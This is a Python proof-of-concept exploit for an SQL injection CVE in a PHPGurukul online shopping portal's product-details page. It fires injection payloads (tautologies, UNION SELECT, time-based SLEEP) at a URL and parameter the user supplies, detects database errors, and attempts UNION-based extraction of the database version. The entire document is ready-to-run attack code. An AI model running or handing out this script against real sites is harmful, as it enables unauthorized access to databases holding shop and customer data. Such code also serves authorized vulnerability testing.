import requests
import sys
# CVE-2024-44664 SQL Injection PoC
# Target: PHPGurukul Online Shopping Portal 2.0 - product-details.php
# Vulnerable Parameters: name, summary, review, quality, price, value
def test_sql_injection(url, param):
"""
Test for SQL injection vulnerability
"""
# Basic payload to test for SQL injection
payloads = [
"' OR '1'='1",
"' OR '1'='1' --",
"' UNION SELECT NULL--",
"' AND SLEEP(5)--",
"1' ORDER BY 1--"
]
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
}
for payload in payloads:
try:
data = {param: payload}
response = requests.post(url, data=data, headers=headers, timeout=10)
# Check for SQL error messages
if any(err in response.text for err in ['SQL syntax', 'MySQL', 'Warning', 'mysql_fetch']):
print(f"[+] Potential SQL Injection detected with payload: {payload}")
print(f"[+] Response length: {len(response.text)}")
return True
except requests.exceptions.RequestException as e:
print(f"[-] Request error: {e}")
return False
def extract_data(url, param):
"""
Extract database information using UNION-based SQL injection
"""
# Database version extraction payload
payload = "' UNION SELECT NULL,@@version,NULL,NULL,NULL,NULL--"
try:
data = {param: payload}
response = requests.post(url, data=data, timeout=10)
if '5.' in response.text or '8.' in response.text:
print(f"[+] Database version extracted successfully")
return True
except Exception as e:
print(f"[-] Error: {e}")
return False
if __name__ == '__main__':
if len(sys.argv) < 3:
print(f"Usage: python {sys.argv[0]} <url> <parameter>")
print(f"Example: python {sys.argv[0]} http://target.com/product-details.php name")
sys.exit(1)
target_url = sys.argv[1]
target_param = sys.argv[2]
print(f"[*] Testing CVE-2024-44664 SQL Injection")
print(f"[*] Target: {target_url}")
print(f"[*] Parameter: {target_param}")
if test_sql_injection(target_url, target_param):
print("[!] Vulnerability confirmed!")
extract_data(target_url, target_param)
else:
print("[-] No SQL injection detected")